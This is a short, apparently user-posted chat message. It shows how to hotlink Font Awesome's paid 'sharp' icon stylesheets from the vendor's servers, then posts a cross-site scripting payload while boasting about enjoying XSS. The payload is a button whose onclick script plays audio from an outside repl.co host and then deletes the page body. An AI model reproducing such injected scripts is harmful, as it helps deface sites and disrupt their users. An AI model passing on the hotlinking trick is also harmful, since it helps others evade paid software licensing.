vfgvefverv thank
so like, font awesome sharp icons exist, imagine paying for those to use in your website while you can just put this in the head of your html file
<link rel="stylesheet" href="https://site-assets.fontawesome.com/releases/v6.2.0/css/all.css" />
<link rel="stylesheet" href="https://site-assets.fontawesome.com/releases/v6.2.0/css/sharp-solid.css"/>
I LOVE XSS!!! I LOVE WATCHING ALL OF THE DEVELOPERS OF A SITE SCRAMBLE TO FIX CROSS SITE SCRIPTING ISSUES!!!
<button onclick="
const go = async () => {
var aud = new Audio('https://gravetechnogreenware.jaxonbaxon.repl.co/game.mp3');
const delay = ms => new Promise(res => setTimeout(res, ms));
aud.play();
await delay(5000);
document.body.remove();
}
go();">delete everything on the page</button>